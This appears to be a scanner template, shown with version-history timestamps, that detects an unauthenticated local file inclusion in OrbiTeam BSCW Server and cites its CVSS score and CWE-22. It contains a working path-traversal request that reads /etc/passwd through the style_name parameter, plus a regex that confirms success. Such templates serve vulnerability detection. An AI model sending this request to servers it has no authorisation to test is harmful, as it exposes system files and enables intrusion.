2022-06-10 13:07:39 +00:00
id : orbiteam-bscw-server-lfi
2022-08-05 13:57:51 +00:00
2022-06-10 11:24:46 +00:00
info :
2022-08-05 13:57:51 +00:00
name : OrbiTeam BSCW Server - Local File Inclusion
2022-06-10 11:24:46 +00:00
author : 0x_Akoko
severity : high
2022-06-10 13:07:39 +00:00
description : |
2022-08-05 13:57:51 +00:00
OrbiTeam BSCW Server versions 5.0.x, 5.1.x, 5.2.4 and below, 7.3.x and below, and 7.4.3 and below are vulnerable to unauthenticated local file inclusion.
2022-06-10 11:24:46 +00:00
reference :
- https://packetstormsecurity.com/files/165156/OrbiTeam-BSCW-Server-XSS-LFI-User-Enumeration.html
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-06-10 13:07:39 +00:00
tags : bscw,orbiteam,lfi,unauth
2022-06-10 11:24:46 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2022-08-05 13:57:51 +00:00
# Enhanced by mp on 2022/08/04